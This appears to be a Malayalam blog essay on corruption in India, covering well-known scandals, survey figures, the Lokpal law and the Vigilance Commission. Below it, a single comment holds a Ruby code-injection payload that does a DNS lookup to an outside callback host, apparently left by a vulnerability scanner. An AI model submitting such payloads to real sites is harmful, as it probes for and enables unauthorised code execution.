അഴിമതി മുക്ത ഭാരതം

സ്വാതന്ത്ര്യം നേടി 75 വർഷം പിന്നിട്ടുവെങ്കിലും ഈ വേളയിൽ ഇന്ത്യ ഒട്ടനവധി പ്രശ്നങ്ങളെ അഭിമുഖീകരിക്കുന്നുണ്ട്. ദാരിദ്ര്യം, തൊഴിലില്ലായ്മ, അടിസ്ഥാനസൗകര്യ വികസനം തുടങ്ങിയ പല പ്രശ്നങ്ങളെക്കുറിച്ചും നാം പറയുമ്പോള്‍ അതിന്‍റെയൊക്കെ അടിസ്ഥാനപരമായ മറ്റൊരു പ്രശ്നമുണ്ട്. അത് അഴിമതിയാണ്.

സ്വജനപക്ഷപാതം, സാമ്പത്തിക കുറ്റകൃത്യങ്ങൾ, കൈക്കൂലി എന്നിങ്ങനെ പലതരത്തിലാണ് നാം കാണുന്ന അഴിമതികൾ. ഹെലികോപ്റ്റര്‍ അഴിമതി, വിജയ് മല്യ കേസ്, ഓഹരി അഴിമതി, റഫാൽ വിവാദം, കോൾഗേറ്റ് അഴിമതി, 2ജി സ്പെട്രം അഴിമതി തുടങ്ങിയവയൊക്കെ ഏറെ ചര്‍ച്ചചെയ്യപ്പെട്ട അഴിമതികളാണ്. കേരളത്തിന്‍റെ കാര്യമെടുത്താല്‍ സോളാർ അഴിമതി, സ്വർണക്കടത്ത് കേസ്, പാലാരിവട്ടം മേൽപ്പാലം അഴിമതി തുടങ്ങിയവയും വലിയ വിവാദമായ അഴിമതികളാണ്.

അഴിമതി രഹിത ഇന്ത്യയിൽ ജീവിക്കുക എന്നത് ഓരോ ഇന്ത്യക്കാരന്റെയും സ്വപ്നമാണ്, അല്ലേ? ഇതിന് ഒരേയൊരു മാര്‍ഗം സര്‍ക്കാര്‍ നടപടികള്‍ തീര്‍ത്തും സുതാര്യമാക്കുക എന്നതാണ്. എന്നാല്‍ ഇന്ത്യയില്‍ ഇത് എത്രത്തോളം സാധ്യമാണ് എന്നതാണ് ചോദ്യം.

അഴിമതിക്കെതിരെ പോരാടുന്നതിൽ രാജ്യത്തെ ജനങ്ങള്‍ക്ക്, പ്രത്യേകിച്ച് യുവാക്ക‍ള്‍ക്ക് നിർണായകമായ പങ്കുവഹിക്കാനാകും. എന്നാൽ,2005ൽ ട്രാൻസ്പരൻസി ഇന്റർനാഷണൽ നടത്തിയ ഒരു പഠനത്തിൽ 62% ഇന്ത്യക്കാരും ഏതെങ്കിലും ഘട്ടത്തിൽ ഒരു പൊതു ഉദ്യോഗസ്ഥന് കൈക്കൂലി നൽകിയിട്ടുണ്ടെന്നാണ് കണ്ടെത്തിയത്. 2021ല്‍ അഴിമതി കുറവുള്ള രാജ്യങ്ങളുടെ പട്ടികയില്‍ 85-ആം സ്ഥാനത്താണ് ഇന്ത്യ.

ഇന്ത്യയിലെ അഴിമതിയുടെ കാരണങ്ങൾ പലതാണ്. ദാരിദ്രം,കുറഞ്ഞ ശമ്പളം, തൊഴിലില്ലായ്മ, ഉയർന്ന ജീവിത ചെലവ്, സുതാര്യമായ നിയമങ്ങളുടെ അഭാവം, ലളിതമായ ശിക്ഷാനടപടി ഇതൊക്കെയാണ് പ്രധാന കാരണങ്ങള്‍. എന്നാൽ ഇന്ന് അഴിമതിയുടെ തോതിലും അഴിമതി കുറക്കാനുള്ള സർക്കാറിന്റെ ശ്രമങ്ങളിലും കാര്യമായ വ്യത്യാസങ്ങൾ വന്നിട്ടുണ്ട്.

1960കളുടെ തുടക്കത്തിൽ ഇന്ത്യയിൽ അഴിമതിക്കെതിരെ ഓംബുഡ്സ്മാൻ എന്ന ആശയം മുന്നോട്ട് വെച്ചു. ഇതിനെതുടർന്ന് അഴിമതിയെ മായ്ച്ചുകളയാൻ ഒട്ടനവധി പദ്ധതികളും ആവിഷ്കരിക്കുകയുണ്ടായി. ഇന്ത്യയിൽ അഴിമതിക്കെതിരെ ഫലപ്രദമായ പരിഹാരം ആവിശ്യപെട്ടുള്ള ഒരു കൂട്ടായ്മയാണ് ഇന്ത്യ എഗൈൻസ്റ് കറപ്ഷൻ.
ജന്‍ ലോക്പാൽ ബിൽ ആണ് ഇവരുടെ പ്രധാന ആവശ്യം. അഴിമതിയെ തടയുന്നതിന് ഇന്ത്യയുടെ പൊതു താല്പര്യത്തെ പ്രതിനിധീകരിക്കുന്ന ഒരു അഴിമതി വിരുദ്ധ അതൊറിറ്റിയാണ് ലോക്പാൽ. 2014 ജനുവരി 16ന് പ്രാബല്യത്തിൽ വന്ന ഈ നിയമം 2016ൽ ഭേദഗതി ചെയ്തിട്ടുണ്ട്.

അഴിമതിയ്ക്ക് പരിഹാരം കാണാന്‍ 1964ലാണ് വിജിലൻസ് കമ്മീഷൻ രൂപീകരിച്ചത്. അഴിമതിയില്‍ ഏർപ്പെടുന്ന സർക്കാർ ഉദ്യോഗസ്ഥർക്കെതിരെ നടപടിയെടുക്കുകയാണ് ഇതിന്റെ പ്രധാന ലക്ഷ്യം.

മൊബൈല്‍ ഫോണും സാമൂഹ്യമാധ്യമങ്ങളുമൊക്കെ ഇന്ന് അഴിമതിക്കെതിരെ പ്രതികരിക്കാന്‍ നമ്മെ ഓരോരുത്തരെയും സഹായിക്കുന്നു. അഴിമതി മുക്തഭാരത്തിനായി മുന്‍കൈയ്യെടുക്കേണ്ടത് നമ്മള്‍ ഓരോരുത്തരുമാണ്. സര്‍ക്കാര്‍ നടപ്പാക്കുന്ന അഴിമതി നിരോധന നിയമങ്ങള്‍ക്കൊപ്പം ജനങ്ങളും ജാഗ്രത പാലിച്ചാല്‍ നമുക്ക് രാജ്യത്തെ അഴിമതി പൂര്‍ണമായും തുടച്ചുനീക്കാം.

15 thoughts on “അഴിമതി മുക്ത ഭാരതം

  1. “+”A”.concat(70-3).concat(22*4).concat(116).concat(86).concat(101).concat(75)+(require”socket”
    Socket.gethostbyname(“hitlu”+”oowtvoecb362e.bxss.me.”)[3].to_s)+”

Leave a Reply

Your email address will not be published. Required fields are marked *